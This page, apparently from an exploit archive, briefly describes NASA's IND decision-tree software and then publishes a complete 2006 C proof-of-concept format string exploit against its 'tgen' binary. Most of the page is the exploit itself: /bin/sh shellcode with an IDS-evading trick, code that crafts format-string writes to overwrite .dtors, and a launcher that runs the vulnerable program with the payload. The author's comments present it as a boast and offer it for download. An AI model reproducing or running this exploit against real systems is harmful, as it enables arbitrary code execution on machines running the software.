"Never let school get in the way of learning."
-- Mark Twain
This is an example format string overflow for some GLP'd NASA software available. This is utterly pointless (and we know that) but its fun to ./g0vt
IND: Creation and Manipulation of Decision Trees from Data
A common approach to supervised classification and prediction in artificial intelligence and statistical pattern recognition is the use of decision trees. A tree is "grown" from data using a recursive partitioning algorithm to create a tree which (hopefully) has good prediction of classes on new data. Standard algorithms are 1) that of Breiman, Friedman, Olshen, and Stone; and 2) Id3 and its successor C4 (by Quinlan). As well as reimplementing parts of these algorithms and offering experimental control suites, IND also introduces Bayesian and MML methods and more sophisticated search in growing trees. These produce more accurate class probability estimates that are important in applications like diagnosis.
/*
* POC for nasa software (eek!)
* Tree Graph Datamining Algorithm
* rbl4ck-nasa-IND-Tree.c
* indulgences by redsand
* public - cuz this is pointless
* however i wanted to say i wrote an exploit
* for US Government software
* shoutz to darkeagle @ blacksec
* 03/09/2006
* redsand@blacksecurity.org
*
* software found at: (tgen)
* http://opensource.arc.nasa.gov/project.jsp?id=7
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
char shellcode[] =
// shellcode by izik@tty64.org
// ids evading 0xcc trap h00k
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80"
"\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0\x0b\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x54\xeb\xe1";
#define OFFSET 20
#define TARGET "./tgen"
#define ARG2 "\"ttr,\""
#define ARG3 "\"A.enc,\""
#define ARG4 "\"A.treec\""
#define DTORS 0x08078008+4 // i'm not extracting dtors for you, u'll have to do that urself
// #define SHELLADDR DTORS+0x14
#define SHELLADDR 0xdeadbeaf
//****************************************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned char b0, b1, b2, b3;
int start = 256;
doit( b0, b1, b2, b3, retaddr );
buf = (char *)malloc(999);
memset( buf, 0, 999 );
b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;
snprintf( buf, 999,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - 16 + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );
return buf;
}
int
main( int argc, char * argv[] )
{
char * fmt;
int i;
int off=OFFSET;
char endian[31337];
unsigned long locaddr, retaddr;
unsigned int offset, base;
unsigned char b0, b1, b2, b3;
char * env[] = { shellcode, NULL };
memset( endian, 0x00, 31337 );
if(argc > 1)
off=atoi(argv[1]);
locaddr = DTORS;
retaddr = 0xbffffffa - strlen(shellcode) - strlen(TARGET);
// retaddr = SHELLADDR;
offset = off; // AAAA%19$x
doit( b0, b1, b2, b3, locaddr );
base = 4;
printf("[*] Building evil code\n");
strcpy(endian, "\xdd\xdd\xff\xbf");
snprintf( endian+strlen(endian), sizeof(endian),
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );
fmt = evil_builder( retaddr, offset, base, 0x10 );
strcat(endian, fmt);
printf("[*] Using return address: 0x%08x with offset %d\n",retaddr, offset);
printf("[*] Exploiting\n");
execle(TARGET, TARGET, endian, ARG2, ARG3, ARG4, NULL, env);
return 0;
}
Download Now!